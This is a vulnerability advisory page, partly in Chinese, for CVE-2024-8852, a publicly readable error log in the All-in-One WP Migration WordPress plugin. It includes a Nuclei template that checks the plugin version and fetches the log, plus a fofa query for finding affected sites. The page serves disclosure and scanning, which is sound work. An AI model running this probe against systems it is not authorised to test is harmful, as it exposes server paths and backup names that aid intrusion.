CVE-2024-8852: All-in-One WP Migration < 7.87 - Unauthenticated Information Disclosure

日期: 2025-11-14 | 影响软件: All-in-One WP Migration | POC: 已公开

漏洞描述

The All-in-One WP Migration and Backup plugin for WordPress is vulnerable to unauthenticated information disclosure due to its error.log file being publicly accessible in versions before 7.87.

PoC代码[已公开]

id: CVE-2024-8852

info:
  name: All-in-One WP Migration < 7.87 - Unauthenticated Information Disclosure
  author: FLX
  severity: medium
  description: |
    The All-in-One WP Migration and Backup plugin for WordPress is vulnerable to unauthenticated information disclosure due to its error.log file being publicly accessible in versions before 7.87.
  impact: |
    An unauthenticated attacker can access the error.log file, which may contain sensitive information such as full server path disclosures, backup filenames, and other debugging details. This information could be used in further attacks.
  remediation: |
    Update the All-in-One WP Migration and Backup plugin to version 7.87 or later.
  reference:
    - https://wpscan.com/vulnerability/9f533098-8435-4ee1-a423-5142070ceefc/
    - https://wordpress.org/plugins/all-in-one-wp-migration/#developers
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: cve-2024-8852
    cwe-id: CWE-532
  metadata:
    verified: true
    fofa-query: body="/wp-content/plugins/all-in-one-wp-migration"
  tags: cve,cve2024,wpscan,wp,wordpress,wp-plugin,all-in-one-wp-migration,disclosure

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - compare_versions(version, '< 7.87')
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - "(?mi)Stable tag: ([0-9.]+)"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/storage/error.log"

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, 'Number', 'Message')
          - contains(tolower(header), 'text/plain')
        condition: and
# digest: 4a0a00473045022100ea1413eb2955023d270ed2e404a1eac24a5ee20a9d95860ecaac4bf88b462a91022038ef5349176a14a06f62f7ccfb63f47569f8fab98f05e66cdf8d4a922efbae69:922c64590222798bb761d5b6d8e72950

相关漏洞推荐